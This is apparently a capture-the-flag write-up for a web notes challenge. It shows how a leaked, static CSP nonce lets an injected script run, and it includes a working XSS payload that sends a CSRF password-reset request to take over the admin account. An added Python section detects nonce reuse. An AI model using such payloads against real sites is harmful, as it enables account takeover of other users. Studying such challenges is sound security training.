Playing Hacks and Stuffs!
Here's the writeup I put up on my teammate's blog: @writeup
Visiting the URL shows this:
We have the option to register and login
So I will register since I don’t have any credentials
After I registered I got this
From that we can see that we can write any HTML tag, but JavaScript is disabled.
When I clicked "Create New Note" I got this:
I can inject any tag I want
After creating it I got this
Ok it actually allows any tag
But it isn’t executed
We can share the note to the admin
I tried to inject a script tag to alert 'test'.
But it didn't work, even though the tag is there.
The interesting question is: why isn't that JavaScript executing?
Well, if you take a look at the debug console you will see this:
There's a CSP that prevents us from performing XSS.
But the response itself gives away the nonce.
Since we have it, we can bypass the CSP.
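A nonce only protects a CSP if every response carries a fresh, unguessable one; the bypass above works because the app hands out a nonce an attacker can copy into their own script tag. Added example (not part of the original writeup or the challenge's code): a small parser for the script-src nonce, a check that flags a nonce reused across several responses, and a generator for the per-response nonce a fixed app should send. The sample headers are constructed; the only value taken from the page is the nonce the exploit reuses.

```python
import re
import secrets
from typing import Iterable, List, Optional, Tuple

# Matches 'nonce-<value>' source expressions inside a CSP directive.
NONCE_RE = re.compile(r"'nonce-([A-Za-z0-9+/=_-]+)'")


def script_nonces(csp_header: str) -> List[str]:
    """Return the nonce values listed in the script-src directive of a CSP header."""
    for directive in csp_header.split(";"):
        parts = directive.strip().split()
        if parts and parts[0] == "script-src":
            return NONCE_RE.findall(directive)
    return []


def reused_nonce(csp_headers: Iterable[str]) -> Optional[str]:
    """Return the first nonce seen in more than one response, or None if each response
    used a fresh one. A reused nonce means any attacker who has seen one response can
    author a <script nonce=...> that the CSP will accept."""
    seen = set()
    for header in csp_headers:
        for nonce in script_nonces(header):
            if nonce in seen:
                return nonce
            seen.add(nonce)
    return None


def fresh_csp_header() -> Tuple[str, str]:
    """Build the CSP header a hardened app should emit: a new 128-bit random nonce
    per response, so a nonce observed in one response is useless for the next."""
    nonce = secrets.token_urlsafe(16)
    return nonce, f"default-src 'self'; script-src 'nonce-{nonce}'"


# Constructed sample: three responses from the vulnerable app, all carrying the same
# nonce that the writeup's exploit copies into its script tag.
STATIC_NONCE_RESPONSES = [
    "default-src 'self'; script-src 'nonce-2726c7f26c'",
    "default-src 'self'; script-src 'nonce-2726c7f26c'",
    "default-src 'self'; script-src 'nonce-2726c7f26c'",
]
```

`reused_nonce(STATIC_NONCE_RESPONSES)` returns the repeated nonce, while a list built from `fresh_csp_header()` returns None.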
Looking around the web app reveals this function:
We can reset our password.
This is interesting because we know we can share our note with the admin user, and we have XSS.
So this gives us an opportunity to escalate the XSS to CSRF.
This is the request made when resetting a password:
We can now leverage this to change the admin's password.
Here's the exploit script:
<script nonce="2726c7f26c">
  // Nonce copied from the CSP header in the response, so this inline script is allowed to run.
  // When the admin views the shared note, their browser sends the password-reset request
  // with their own session, changing the admin password to "chained".
  const url = 'https://ctftogo-b6247a6b4d3c-markdown-1.chals.io/profile';
  fetch(url, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'password=chained',
  });
</script>
I created a note with that content.
Then I shared it with the admin.
We can now log in with admin:chained.
And the flag is shown after logging in.
Flag: flag{look_at_me_im_the_admin_now}